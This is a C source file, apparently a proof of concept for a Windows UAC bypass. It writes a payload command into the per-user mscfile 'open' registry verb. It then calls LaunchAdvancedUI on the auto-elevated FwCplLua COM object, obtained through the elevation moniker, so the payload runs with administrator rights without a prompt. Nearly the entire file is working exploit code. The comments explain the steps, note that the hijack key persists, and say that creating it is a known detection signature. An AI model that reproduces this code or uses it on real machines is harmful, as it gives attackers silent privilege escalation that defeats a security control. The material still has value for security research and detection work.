UAC bypass PoC: the auto-elevated FwCplLua COM class (reached through the "Elevation:Administrator!new:" moniker) is asked to launch its advanced UI, while a per-user HKCU\Software\Classes\mscfile\shell\open\command entry has been hijacked so the .msc it opens resolves to an attacker-chosen command.
/* Forward declaration so the vtable prototypes below can take an IFwCplLua*
   before the interface struct itself is defined ("interface" is the COM
   headers' spelling of "struct"). */
typedef interface IFwCplLua IFwCplLua;
/*
 * Hand-declared vtable of the undocumented IFwCplLua interface (no public
 * header exists for it). Only the slot positions matter: the three IUnknown
 * methods come first, then fifteen methods this code never invokes
 * (placeholder names Method1..Method15, prototyped with just the This pointer
 * because nothing here calls them), and LaunchAdvancedUI at slot 19, the only
 * method Method42b_Test uses. Adding, removing or reordering an entry would
 * make the call below land on a different method of the real object.
 */
typedef struct IFwCplLuaInterfaceVtbl {
    BEGIN_INTERFACE

    /* Slots 1-3: IUnknown */
    HRESULT (STDMETHODCALLTYPE *QueryInterface)(__RPC__in IFwCplLua *This, __RPC__in REFIID riid, _COM_Outptr_ void **ppvObject);
    ULONG (STDMETHODCALLTYPE *AddRef)(__RPC__in IFwCplLua *This);
    ULONG (STDMETHODCALLTYPE *Release)(__RPC__in IFwCplLua *This);

    /* Slots 4-18: unresolved, kept only to reach the slot we need */
    HRESULT (STDMETHODCALLTYPE *Method1)(__RPC__in IFwCplLua *This);
    HRESULT (STDMETHODCALLTYPE *Method2)(__RPC__in IFwCplLua *This);
    HRESULT (STDMETHODCALLTYPE *Method3)(__RPC__in IFwCplLua *This);
    HRESULT (STDMETHODCALLTYPE *Method4)(__RPC__in IFwCplLua *This);
    HRESULT (STDMETHODCALLTYPE *Method5)(__RPC__in IFwCplLua *This);
    HRESULT (STDMETHODCALLTYPE *Method6)(__RPC__in IFwCplLua *This);
    HRESULT (STDMETHODCALLTYPE *Method7)(__RPC__in IFwCplLua *This);
    HRESULT (STDMETHODCALLTYPE *Method8)(__RPC__in IFwCplLua *This);
    HRESULT (STDMETHODCALLTYPE *Method9)(__RPC__in IFwCplLua *This);
    HRESULT (STDMETHODCALLTYPE *Method10)(__RPC__in IFwCplLua *This);
    HRESULT (STDMETHODCALLTYPE *Method11)(__RPC__in IFwCplLua *This);
    HRESULT (STDMETHODCALLTYPE *Method12)(__RPC__in IFwCplLua *This);
    HRESULT (STDMETHODCALLTYPE *Method13)(__RPC__in IFwCplLua *This);
    HRESULT (STDMETHODCALLTYPE *Method14)(__RPC__in IFwCplLua *This);
    HRESULT (STDMETHODCALLTYPE *Method15)(__RPC__in IFwCplLua *This);

    /* Slot 19: the one method this PoC calls on the elevated object */
    HRESULT (STDMETHODCALLTYPE *LaunchAdvancedUI)(__RPC__in IFwCplLua *This);

    END_INTERFACE
} *PIFwCplLuaInterfaceVtbl;
/* The interface object itself: nothing but a pointer to the vtable above,
   which is what makes FwCplLua->lpVtbl->LaunchAdvancedUI(FwCplLua) work. */
interface IFwCplLua
{
CONST_VTBL struct IFwCplLuaInterfaceVtbl *lpVtbl;
};
/* Elevation-moniker target class and the interface requested from it.
   T_CLSID_FwCplLua is appended to "Elevation:Administrator!new:" below, so
   this class is expected to be marked auto-approved for elevation (no UAC
   prompt from a medium-IL caller). Presumably the Windows Firewall
   control-panel helper, going by the name -- verify against the class's
   Elevation registration on the target build before relying on it. */
#define T_CLSID_FwCplLua L"{752438CB-E941-433F-BCB4-8B7D2329F0C8}"
#define T_IID_IFwCplLua L"{56DA8B35-7FC3-45DF-8768-664147864573}"
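/*
 * Method42b_Test
 *
 * UAC bypass proof of concept. Steps, as implemented here:
 *  1. Create HKCU\Software\Classes\mscfile\shell\open\command and set its
 *     default value to the payload command line (per-user key, so no
 *     privilege is needed to plant it).
 *  2. Instantiate the FwCplLua class through the
 *     "Elevation:Administrator!new:" moniker, i.e. as an auto-elevated
 *     out-of-process server.
 *  3. Call IFwCplLua::LaunchAdvancedUI on it. Per the gist description this
 *     opens an .msc from the elevated process, which resolves the mscfile
 *     open verb -- now pointing at the payload -- at high integrity.
 *
 * lpszPayload  Command line to write as the mscfile open verb. NULL or empty
 *              falls back to C:\windows\system32\cmd.exe, the value the
 *              original hard-coded (the parameter used to be ignored).
 *              Must be at most MAX_PATH characters; longer input is rejected.
 *
 * Returns TRUE when CoGetObject and LaunchAdvancedUI both report success.
 * That only means the elevated call went through; it does not confirm that
 * the payload actually executed.
 *
 * Caveats for anyone reusing this:
 *  - The hijacked key is created and LEFT IN PLACE on every path, including
 *    failure after it was written. Until the caller deletes
 *    HKCU\Software\Classes\mscfile\shell\open\command, any later elevated .msc
 *    launch for this user runs the payload again. Creation of that key is
 *    also a well-known detection signature, so expect it to be alerted on.
 *  - COM is assumed to be initialised on the calling thread (CoInitializeEx);
 *    nothing in this function does it.
 *  - The registry key is opened with KEY_SET_VALUE only, which is all
 *    RegSetValueEx needs; the original asked for MAXIMUM_ALLOWED.
 */
BOOL Method42b_Test(
    LPWSTR lpszPayload
)
{
    HRESULT r = E_FAIL;
    LRESULT lResult;
    HKEY hKey = NULL;
    SIZE_T sz = 0;
    IID xIIDFwCplLua;
    IFwCplLua *FwCplLua = NULL;
    BIND_OPTS3 bop;
    WCHAR szBuffer[MAX_PATH + 1];
    WCHAR szElevationMoniker[MAX_PATH];

    do {
        if (IIDFromString(T_IID_IFwCplLua, &xIIDFwCplLua) != S_OK)
            break;

        /* Pick the payload. szBuffer holds MAX_PATH characters plus the
           terminator, so a caller-supplied string is length-checked before
           the unbounded _strcpy. */
        if (lpszPayload != NULL && lpszPayload[0] != L'\0') {
            sz = _strlen(lpszPayload);
            if (sz > MAX_PATH)
                break;
            _strcpy(szBuffer, lpszPayload);
        } else {
            _strcpy(szBuffer, L"C:\\windows\\system32\\cmd.exe");
            sz = _strlen(szBuffer);
        }

        /* Plant the per-user mscfile open verb. HKCU is writable by the
           current user, which is the whole point of using it here. */
        lResult = RegCreateKeyEx(HKEY_CURRENT_USER,
            L"Software\\Classes\\mscfile\\shell\\open\\command",
            0,
            NULL,
            REG_OPTION_NON_VOLATILE,
            KEY_SET_VALUE,
            NULL,
            &hKey,
            NULL);
        if (lResult != ERROR_SUCCESS)
            break;

        /* Default value; size includes the terminating NUL as REG_SZ expects. */
        lResult = RegSetValueEx(
            hKey,
            TEXT(""),
            0,
            REG_SZ,
            (BYTE *)szBuffer,
            (DWORD)((sz + 1) * sizeof(WCHAR)));
        if (lResult != ERROR_SUCCESS)
            break;

        RegCloseKey(hKey);
        hKey = NULL;

        /* Ask COM for an auto-elevated instance of the FwCplLua class.
           Prefix (28 chars) + CLSID string (38 chars) fits MAX_PATH easily. */
        _strcpy(szElevationMoniker, L"Elevation:Administrator!new:");
        _strcat(szElevationMoniker, T_CLSID_FwCplLua);

        RtlSecureZeroMemory(&bop, sizeof(bop));
        bop.cbStruct = sizeof(bop);
        bop.dwClassContext = CLSCTX_LOCAL_SERVER;

        r = CoGetObject(szElevationMoniker, (BIND_OPTS *)&bop, &xIIDFwCplLua, (void **)&FwCplLua);
        if (FAILED(r))
            break;
        if (FwCplLua == NULL) {
            r = E_FAIL;
            break;
        }

        /* Slot 19 of the hand-declared vtable; this is the elevated action
           that ends up resolving the hijacked mscfile verb. */
        r = FwCplLua->lpVtbl->LaunchAdvancedUI(FwCplLua);

    } while (FALSE);

    /* Only reached with hKey open if RegSetValueEx failed. */
    if (hKey != NULL)
        RegCloseKey(hKey);

    if (FwCplLua != NULL)
        FwCplLua->lpVtbl->Release(FwCplLua);

    return SUCCEEDED(r);
}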